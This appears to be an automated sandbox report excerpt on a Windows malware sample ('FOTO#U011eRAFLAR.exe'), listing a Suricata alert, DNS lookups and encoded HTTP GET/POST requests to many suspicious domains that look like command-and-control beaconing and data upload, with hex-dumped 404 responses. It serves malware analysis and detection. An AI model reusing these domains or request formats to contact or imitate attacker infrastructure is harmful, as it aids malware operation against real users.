                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49738
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8CD62 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00D8CD62
                Source: global trafficHTTP traffic detected: GET /rw0k/?SJLty=7Zsl8bAHqdkHEnH&C0oD=2O+BQtagKd2e0tCHf7cQEGpCdZEKMcu8KUvQppDq45CT9l+c4kN/Nkqe5cwEa/TPiwCfdT9AeaeBmqjtzD2yf/vyAaenMmGVr/csdah4RHR/FTYhQMTHjoI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.bookingservice.centerConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4y21/?C0oD=mPRMxh+e+VE7Ove39Sw8dmi+aOJGAWH5jFedH8atyVdfIyLeJFBfjy5Y1KL2B+s6BQDtsLRij94DPPI3pu69UR9kCgLa8mV6DaG1kiIWnyUqRHhlgCWSgg4=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.conansog.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a9if/?SJLty=7Zsl8bAHqdkHEnH&C0oD=NPCF0Cc5uwbi+9CdLylAZ+4kLxMnwTwBBFY+WmZ6z4eVD7VdFSaEtftDik7huU9slgF1galMdGpPyLMnTxOlI51ovglTUHTdL9cfhIyo0GaR7r/EyDMZf0s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.mycleanupfiesta.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6iur/?C0oD=0nMJct3q1A3XzMXjE+ivshWrQE+XNY2vZkYEnxQvgljfmjLPkYHFjKqOBb0jruiOvYz34q23vFgZrlJgY/jJPVhUzqIQSZTSSXUfz9p/TbKa5+cetqeuNbw=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.43kdd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /34uy/?C0oD=KSNenRUz0x3jwwaFmZETAA9KYzPdWounuY72k7Av3QdD/OE/Wc5w7TzUcZjUVirDVR5tYsYUnylr3EOuBfofYgQDaG0iHWLP0vmwml0k5CsL5iUNPuoNBRw=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.fitlook.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pmk2/?C0oD=3De3Y80JIFpHXFcRK4zsuRoR2JqTRvVObOTBM3no2IT+Ydj8n3o/JZofxiKD9jGsDaNhY1uQAIUnKpNiMGMuE6w7CVHn6nbaXTI3bq+rgxbHjMuEgJndnnM=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.t19yd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ow2x/?C0oD=mwEJPxghqBP0HS9n1X+CrOIbCVLsB2OYlrv9OZrAb/GKMQe/j/2ClGpq87hpEmyNapVO3nqvych02uE3cVtiKilbfBQm7ePgulBUbiKMxe88UCqWlHKJoDI=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.qwibie.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /kfzf/?C0oD=745Y/jOyjUFFKVt1zrqnMxLflzH3xCS2ztdY3unhpOMZjpxTMolv6jL+LcLzYo7s20rMx9IK4inFAvVSlw+JL0dGgGxHe8jTeLADQYR7lRwUQufrcbnmx6Y=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.tempatmudisini06.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qnzs/?C0oD=GxkDHWsX54BcXdr+X4+GX30U3Lj5RtBkEtwzkqjSlwd5bhdVdKj3SOXRTkGfTnWing/dpWlHheQGrgb9DnLsoxo3QIxkxehw/T2sZhHOm+tURauy0yxjdNs=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.smirpox.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.conansog.shop
                Source: global trafficDNS traffic detected: DNS query: www.mycleanupfiesta.live
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.darkvader.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fitlook.shop
                Source: global trafficDNS traffic detected: DNS query: www.t19yd.top
                Source: global trafficDNS traffic detected: DNS query: www.qwibie.net
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.smirpox.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nonpressure.beauty
                Source: unknownHTTP traffic detected: POST /4y21/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.conansog.shopCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 201Connection: closeOrigin: http://www.conansog.shopReferer: http://www.conansog.shop/4y21/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 43 30 6f 44 3d 72 4e 35 73 79 56 32 59 71 46 42 46 53 64 2f 7a 36 46 6b 67 43 55 44 39 46 50 64 78 42 55 4c 32 69 6d 76 69 4e 74 76 37 39 67 5a 43 65 79 44 4c 4e 44 52 4c 76 54 49 36 36 4c 4c 6c 45 76 70 66 47 48 66 69 6e 34 73 4a 69 73 74 67 42 76 41 78 6e 38 2b 7a 57 77 35 78 43 79 2f 70 38 6c 49 42 62 74 61 66 30 77 4d 43 79 44 35 39 63 58 46 44 6f 42 6e 6b 35 54 68 53 75 59 77 45 31 31 4f 4c 6f 30 53 70 31 37 48 35 4d 57 71 47 6b 76 47 45 30 34 71 4c 35 67 64 39 59 62 6d 44 54 75 76 58 78 78 4d 41 68 6e 46 54 63 51 74 43 73 46 75 37 67 38 38 55 4d 30 51 61 4e 41 37 33 4f 78 43 51 59 67 3d 3d Data Ascii: C0oD=rN5syV2YqFBFSd/z6FkgCUD9FPdxBUL2imviNtv79gZCeyDLNDRLvTI66LLlEvpfGHfin4sJistgBvAxn8+zWw5xCy/p8lIBbtaf0wMCyD59cXFDoBnk5ThSuYwE11OLo0Sp17H5MWqGkvGE04qL5gd9YbmDTuvXxxMAhnFTcQtCsFu7g88UM0QaNA73OxCQYg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Tue, 12 Nov 2024 17:47:45 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:01 GMTContent-Length: 0Connection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3CLJ0OUc0gVY5HDmMZJNhjUcM5XcwVSIWPy6%2F1rbEpGeusG4hWG2vbb%2F8hwK%2FO5bo8%2BobPHJc5L69vwu8SOA4tGeTT9PXBjGG6lMKJzVBiLmhqHE%2FtC6W5aIdGg%2FJ8%2FJMPcug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1859bfda7f3458-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=800&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:04 GMTContent-Length: 0Connection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQoUtzXmkMuEuSgf4Ndqrlr7vwxISkQaQIBFJOmUfWhawfwTYMcE1m4Ha6M13tyf3%2Fw%2FBSku6cfhlOBnwDmaRoL9fXhyU%2FS5HsUVB24WHSnPw3Pnr6hZlU0kjENTpmDKpkIMCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1859cfcb300c46-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2039&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:07 GMTContent-Length: 0Connection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDP2uDL1bZdWPwl7zzgzJcvsXJg%2Fw%2FVI5KLgb8RCnsck542VVTfYncJE1r3EJKd40c7HGxAbv8g5G1bYUJdQF4nZSc8iUgCV61lxiVpYja4EvlVjdyHR6F6P7vUP0d2OCp3QDA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1859dfdf1f0b9d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10902&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:09 GMTContent-Length: 0Connection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSq2TXNm8EycivJra0fCEN0WzUcvAVuK4JgmyuNGkJYA%2FjOBWR8qnzdGApx5U6staJ%2BRaM9JrObjGbj0seCfRjQJdL32DOrKtGm9VZiGdNPQIIzIqJpAKmV%2FvQcV8%2Fe1ulmJQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1859efdd623064-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lMfD4dmSAij7CsFoQtV6hEVIYyzYCKNbYhMRwHnuQpyBj1KqcyemsjQ1mXn%2BWy0M8h855PnOFqxZBB0abFxjqsFetWCLhOOKnYEfOADa%2FkfnaIeAf3pCjyMz%2Bd3cCHfLa7w%2Bv7d7X6a0sek%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e185a152952e767-DENContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=19140&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=821&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2B5bRQeBwN6Fb6UcAghnxtkktft6eztthSjyKjYk4RnZP0aJN%2FYWmQzQvRVA%2BYvS%2Bp%2FOyXXChQT2JIVqCaClOQ1%2BcFEzDFyJZly1SXV6Nd0jNGc628ABUBniOdao6BNVKx6ObwzGw9nBfvE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e185a24e958e751-DENContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=19003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=841&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 61 39 0d 0a 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fa9L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha4kIMHB%2FLrrbGm6D96uxCjsFDZo3ZLo9tMi5v0RTj5kA%2FJ6OegYePIOFQuDW4b1553oiKEJs24hMv3es%2BPgry%2Bvr6AR49gTJtaQULo6FUxOHnydkdEpfmr0I5FPO9V7%2B7NS56PWfI9gsFQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e185a34dbfae75f-DENContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=18775&sent=6&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10923&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a8L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qFb|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:48:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bLPAXvneoM6hF5mnagOFvcmsoG5mvdf80GryTXjc2RMaOi%2BNC3fZr40f1L9zl3YtD5xFGv5lRA9Xq0d%2Fe1z4%2F979aEYba2rK0RR7JdSRTKgeQqDBkYLnICkz6WUoUfkFFU71STrskczGYg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e185a45f918e73b-DENalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=18690&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:48:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
